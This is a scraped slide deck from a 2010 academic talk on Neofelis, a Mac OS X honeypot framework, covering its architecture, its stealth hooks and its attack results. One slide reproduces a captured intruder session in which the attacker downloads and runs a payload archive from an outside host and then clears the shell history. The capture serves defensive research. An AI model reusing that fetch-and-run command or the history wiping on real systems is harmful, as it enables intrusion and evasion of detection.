neofelis
play

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo - PowerPoint PPT Presentation

Nov 27, 2023 •216 likes •378 views

Neofelis High-Interaction Honeypot Framework for Mac OS X Joo Miguel Franco Francisco Nina Rente { jmfranco, frente } at dei.uc.pt Software and System Engineering Research Group FCT University of Coimbra Agenda Agenda

  1. Neofelis High-Interaction Honeypot Framework for Mac OS X João Miguel Franco Francisco Nina Rente { jmfranco, frente } at dei.uc.pt Software and System Engineering Research Group FCT – University of Coimbra

  2. Agenda Agenda ● Introduction Introduction ● Honeypot Definition Honeypot Definition ● Related Work Related Work ● Project Goals Project Goals ● System Architecture System Architecture ● Tested Scenarios Tested Scenarios ● Results Results ● Conclusion and Further Work Conclusion and Further Work 2 IBWAS'10

  3. Introduction Introduction ● There is not such thing as total Secure Systems! There is not such thing as total Secure Systems! ● Zero-day vulnerabilities are more frequently Zero-day vulnerabilities are more frequently ● The sooner you have information on security flaws The sooner you have information on security flaws Sooner critical updates are Less Assets will released be Affected 3 IBWAS'10

  4. Honeypot Definition Honeypot Definition ● Computation resource constantly monitored, whose objective Computation resource constantly monitored, whose objective is to be tested, attacked and compromised. is to be tested, attacked and compromised. ● The data collected during the attack will be the base of a The data collected during the attack will be the base of a posterior analysis. posterior analysis. High-Interaction ● Two types of Honeypots Two types of Honeypots Low-Interaction 4 IBWAS'10

  5. Related Work Related Work ● Argos Argos ● Uses Dynamic Taint Analysis Uses Dynamic Taint Analysis ● Detects zero-day exploits Detects zero-day exploits ● Does not capture activities during the attack Does not capture activities during the attack ● HoneypotX HoneypotX ● Currently not supported Currently not supported ● Older version of Mac OS X, 10.1 Older version of Mac OS X, 10.1 ● Low-interaction honeypot Low-interaction honeypot 5 IBWAS'10

  6. Project Goals Project Goals ● Install and maintain a high-interaction honeypot for Mac OS X Install and maintain a high-interaction honeypot for Mac OS X ● Implement a framework Implement a framework Totally configurable Totally configurable Robust, Scalable Robust, Scalable Ensure integrity of the captured data Ensure integrity of the captured data Generate statistical data Generate statistical data ● Well defined security boundaries Well defined security boundaries 6 IBWAS'10

  7. General Architecture General Architecture 7 IBWAS'10

  8. Information Capture Information Capture ● IOKeys IOKeys Pressed keys during a SSH session Pressed keys during a SSH session SSH session information SSH session information Commands passed as arguments Commands passed as arguments Commands executed in a web-shell Commands executed in a web-shell ● IOEthernet IOEthernet Incoming and Outgoing network packets Incoming and Outgoing network packets ● FSLogger FSLogger 8 IBWAS'10

  9. 9 IBWAS'10

  10. Dissimulate Monitoring Activities Dissimulate Monitoring Activities ● HideProc HideProc __sysctl() __sysctl() ● HideFiles HideFiles getdirentries() getdirentries() getdirentries64() getdirentries64() getdirentriesattr() getdirentriesattr() ● Hide loaded kernel extensions Hide loaded kernel extensions Remove the Kexts from kmod_info linked list Remove the Kexts from kmod_info linked list 10 IBWAS'10

  11. Tested Scenarios Tested Scenarios ● Innumerable possible scenarios Innumerable possible scenarios ● Tested against two Tested against two ● Brute-force attack Brute-force attack Normal user with weak credentials Normal user with weak credentials ● ● Exploitation of a HTTP Web-server Exploitation of a HTTP Web-server Deployed a web-site on Joomla! Deployed a web-site on Joomla! ● 11 IBWAS'10

  12. 12 IBWAS'10

  13. Results (HTTP Server) Results (HTTP Server) ● Deployed a site based on Joomla!, which had the Deployed a site based on Joomla!, which had the vulnerability CVE-2008-3681 vulnerability CVE-2008-3681 ● Recorded 14 Attacks Recorded 14 Attacks Hungary, Belarus, Portugal, Latvia and South Korea Hungary, Belarus, Portugal, Latvia and South Korea ● 2 intrusions that took advantage of the vulnerabilities 2 intrusions that took advantage of the vulnerabilities 13 IBWAS'10

  14. Results (Brute-Force SSH) Results (Brute-Force SSH) 2010-06-29 02:28:13 test França - Isle de France 2010-06-29 02:28:13 test França - Isle de France 02:28:15 - w 02:28:15 - w 02:28:24 - cat /proc/cpuinfo 02:28:24 - cat /proc/cpuinfo 02:28:36 - cat /proc/cpuinfo 02:28:36 - cat /proc/cpuinfo 02:28:37 - w 02:28:37 - w 02:28:43 - uname -a 02:28:43 - uname -a 02:32:38 - cd /tmp 02:32:38 - cd /tmp 02:32:40 - ls -a 02:32:40 - ls -a 02:32:57 - cat final4 02:32:57 - cat final4 02:32:59 - ls -a 02:32:59 - ls -a 02:34:19 - curl -O http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2 02:34:19 - curl -O http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2 02:41:47 - curl -O ; http://rohacker.ucoz.ru/DarwinBooT.tgz ; tar xvf DarwinBooT.tgz ; cd DarwinBooT ; chmod +x 02:41:47 - curl -O ; http://rohacker.ucoz.ru/DarwinBooT.tgz ; tar xvf DarwinBooT.tgz ; cd DarwinBooT ; chmod +x * ; ./darwin ; cd .. ; rm -rf DarwinBooT.tgz ; mv DarwinBooT .cmd * ; ./darwin ; cd .. ; rm -rf DarwinBooT.tgz ; mv DarwinBooT .cmd 2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers 2010-06-29 17:07:24 test França - Midi-Pyrenees, Pamiers 17:07:26 - w 17:07:26 - w 17:07:30 - uname -a 17:07:30 - uname -a 17:07:52 - ls -a 17:07:52 - ls -a 17:07:57 - rm -rf .bash_history 17:07:57 - rm -rf .bash_history 17:07:58 - passwd 17:07:58 - passwd 17:08:23 - w 17:08:23 - w 17:08:25 - ls -a 17:08:25 - ls -a 17:08:32 - history -c -d offset 17:08:32 - history -c -d offset 17:08:33 - exit 17:08:33 - exit 14 IBWAS'10

  15. Conclusion and Futher Work Conclusion and Futher Work ● Neofelis is the first High-Interaction Honeypot for Neofelis is the first High-Interaction Honeypot for Mac OS X Mac OS X ● High-Level of stealthiness High-Level of stealthiness ● Filter network packets through pattern detection Filter network packets through pattern detection ● Integration with an IDS Integration with an IDS 15 IBWAS'10

  16. Thank you very much for your attention. Thank you very much for your attention. Questions? Questions? jfranco at dei.uc.pt frente at dei.uc.pt jfranco at dei.uc.pt frente at dei.uc.pt 16 IBWAS'10

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis

P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis

P ANDAcap A Framework for Streamlining Collection of Full-System Traces Manolis Stamatogiannakis , Herbert Bos, and Paul Groth April 27, 2020 EuroSec 2020 PANDAcap 1 In this Talk Motivation for this work Overview of

1.17k views • 35 slides
Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan

Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan

Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan University of Twente | May 20, 2020 Lab assignment MUD descriptions: youll need to generate them yourselves, tools are available IoT

926 views • 38 slides
Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey

Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey

Active 802.11 Fingerprinting: gibberish and secret handshakes to know your AP Sergey Bratus, Cory Cornelius, Daniel Peebles Dartmouth College Shmoocon 2008 This talk in 5 minutes (1) How it started? TC7, Johnny Cache:

426 views • 23 slides
Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t

Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t

Hot or Not: Fingerprinting hosts through clock skew ^ c = 95, min s ^ ( t ) = 0.11, max s ^ ( t ) = 0.22 ppm s 0 39.0

699 views • 38 slides
Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis

Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis

Secure and Private Smart Grid: The SPEAR Architecture Panagiotis Radoglou-Grammatikis University of Western Macedonia pradoglou@uowm.gr Nets Netsoft 2020 2020 Under SPEAR Project A u t h o r s UOWM TECNALIA TE SID SIDROCO CERTH

550 views • 20 slides
Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon

Beyond Telnet: Prevalence of IoT Protocols in Telescope and Honeypot Measurements Lionel Metongnon 12 Ramin Sadre 1 SIGCOMM-WTMC, 20th August 2018 1 Institute of Information and Communication Technologies, Electronics and Applied Mathematics

561 views • 17 slides
Project 4 Multi-Core Network Honeypot LL/SC - Important for mutex locking/unlocking - Crucial

Project 4 Multi-Core Network Honeypot LL/SC - Important for mutex locking/unlocking - Crucial

Project 4 Multi-Core Network Honeypot LL/SC - Important for mutex locking/unlocking - Crucial for synchronized data-structures - Up to 32 cores in PA4 LL/SC Syntax LL a, off(b): loads M[b + off] into register a SC c, off(d):

289 views • 18 slides
Information warfare The term information warfare refers to peace time activities

Information warfare The term information warfare refers to peace time activities

Information warfare The term information warfare refers to peace time activities psychological operations (psyop) cyber war/net war In wartime the term is Command, Control, Communications, Intelligence, Sensors Warfare(C3ISW)

287 views • 13 slides
FDM curriculum group moderated by Frank Neven Questions / issues FDM topics for non-DB

FDM curriculum group moderated by Frank Neven Questions / issues FDM topics for non-DB

FDM curriculum group moderated by Frank Neven Questions / issues FDM topics for non-DB courses intro DB course graduate FDM course FDM book educate & attract FDM in non-DB course TCS: from reg exps to RPQs DBs

452 views • 9 slides
DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY

DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY

DIY Blue Teaming DIY Blue Teaming (Keeping attackers out, with duct tape and chewing gum!) DIY Blue Teaming DIY Blue Teaming Ways to make malware not work Security by obscurity (because sucker punches work, even though nobody wants to admit

1.11k views • 78 slides
Internet measurements at complexnetworks.fr Guillaume Valadon - http://valadon.complexnetworks.fr

Internet measurements at complexnetworks.fr Guillaume Valadon - http://valadon.complexnetworks.fr

Internet measurements at complexnetworks.fr Guillaume Valadon - http://valadon.complexnetworks.fr LIP6 (CNRS - UPMC) Complex Networks team http://complexnetworks.fr The team http://complexnetworks.fr : plots & videos 4 permanent

899 views • 44 slides
Empirical Studies in Cybersecurity: Some Challenges Michel Cukier Adding Science to

Empirical Studies in Cybersecurity: Some Challenges Michel Cukier Adding Science to

Empirical Studies in Cybersecurity: Some Challenges Michel Cukier Adding Science to Cybersecurity Empirical studies are needed to add science to cybersecurity Challenges: Security metrics are lacking Security data are not

661 views • 37 slides
Big Data Analytics, Human Data Interaction, and the Databox Richard Mortier Cambridge

Big Data Analytics, Human Data Interaction, and the Databox Richard Mortier Cambridge

Big Data Analytics, Human Data Interaction, and the Databox Richard Mortier Cambridge University Computer Laboratory Networks & Operating Systems SRG, Computer Laboratory Outline Part I Part II We are all data subjects,

1.25k views • 46 slides
1 Models for Translucent Objects Models for Translucent Objects Models for Translucent Objects

1 Models for Translucent Objects Models for Translucent Objects Models for Translucent Objects

Translucent Objects Translucent Objects Realistic Materials Realistic Materials Translucent Materials light is scattered through the object incident illumination smoothed due to diffuse scattering inside media Inhomogeneous

524 views • 5 slides
Dating Patterns Aino Vonge Corry @apaipi Big Disclaimer How many times, have you thought 'Boy,

Dating Patterns Aino Vonge Corry @apaipi Big Disclaimer How many times, have you thought 'Boy,

Dating Patterns Aino Vonge Corry @apaipi Big Disclaimer How many times, have you thought 'Boy, I sure wish there was an easier way to pick up women, like published API with code samples?' What would you say if such documentation was not only

623 views • 24 slides
Understanding and Securing Device Vulnerabilities through Automated Bug Report Analysis Xuan Feng

Understanding and Securing Device Vulnerabilities through Automated Bug Report Analysis Xuan Feng

Understanding and Securing Device Vulnerabilities through Automated Bug Report Analysis Xuan Feng , Xiaojing Liao, XiaoFeng Wang, Haining Wang, Qiang Li, Kai Yang, Hongsong Zhu, Limin Sun USENIX Security 2019 Internet-of-Things (IoT) Devices IoT

422 views • 23 slides
Tedder Village www.tedderavenue.com.au ON THE AVENUE TEDDER VILLAGE WWW.TEDDERAVENUE.COM.AU

Tedder Village www.tedderavenue.com.au ON THE AVENUE TEDDER VILLAGE WWW.TEDDERAVENUE.COM.AU

Village Life Tedder Avenue Tedder Avenue Tedder Village www.tedderavenue.com.au ON THE AVENUE TEDDER VILLAGE WWW.TEDDERAVENUE.COM.AU Village Life TEDDER VILLAGE ON THE AVENUE WWW.TEDDERAVENUE.COM.AU ZONES 5 HOW IT WORKS 7 UNDER THE HOOD

321 views • 20 slides
Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC

Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC

Io IoT Ho T Hone neyBot yBot Haris emi and Saa Mrdovi Cryptacus: Workshop and MC meeting Nijmegen, Netherlands, 2017 Honeypots Honeypots Emulation of a network resource Built to be discovered, attacked and compromised

497 views • 18 slides
Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and

Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and

Nomadic Honeypots A Novel Concept for Smartphone Honeypots Steffen Liebergeld , Matthias Lange and Collin Mulliner Security in Telecommunications Technische Universit at Berlin, Germany { steffen,mlange } @sec.t-labs.tu-berlin.de Northeastern

713 views • 11 slides
Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E.

Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E.

Empirical study of the impact of Metasploit-related attacks in 4 years of attack traces E. Ramirez-Silva and M. Dacier Eurcom Institute - Sophia Antipolis, France ASIAN'07 December 11, 2007- Doha, Qatar Introduction Overview Introduction

584 views • 42 slides
Robot Attack! Repelling Bots, DDOS, and other Fiends Stanford Drupal Camp 2015 MEET YOUR GUIDES

Robot Attack! Repelling Bots, DDOS, and other Fiends Stanford Drupal Camp 2015 MEET YOUR GUIDES

Robot Attack! Repelling Bots, DDOS, and other Fiends Stanford Drupal Camp 2015 MEET YOUR GUIDES Suzanne Aldrich Martijn Gonlag Senior Customer Success Engineer - Pantheon Technical Support Engineer - CloudFlare AGENDA Surveying Robots

247 views • 13 slides
E-mail trends in 2010: How do spammers get your address? Using distributed poisoned addresses to

E-mail trends in 2010: How do spammers get your address? Using distributed poisoned addresses to

Motivation How E-mail works Conventional Wisdom Previous Work Implementation Results Conclusion E-mail trends in 2010: How do spammers get your address? Using distributed poisoned addresses to track harvesting behavior Robert Marmorstein

447 views • 17 slides
Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche

Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche

Empirical Analysis and Statistical Modelling of Attack Processes based on Honeypots M. Kaniche 1 , E. Alata 1 , V.Nicomette 1 , Y. Deswarte 1 , M. Dacier 2 LAAS-CNRS 1 , Eurecom 2 Mohamed.Kaaniche@laas.fr ACI Scurit &

409 views • 17 slides
Preparing for the Unthinkable Cyber Security Chicago 2018 Agenda Introduction Security

Preparing for the Unthinkable Cyber Security Chicago 2018 Agenda Introduction Security

Preparing for the Unthinkable Cyber Security Chicago 2018 Agenda Introduction Security Landscape Meraki Security Demo Security Landscape The Growing Importance of Security MALWARE HAS RISEN BY MORE THAN 10X IN THE LAST YEAR 70% M ALW AR E

604 views • 35 slides

More recommend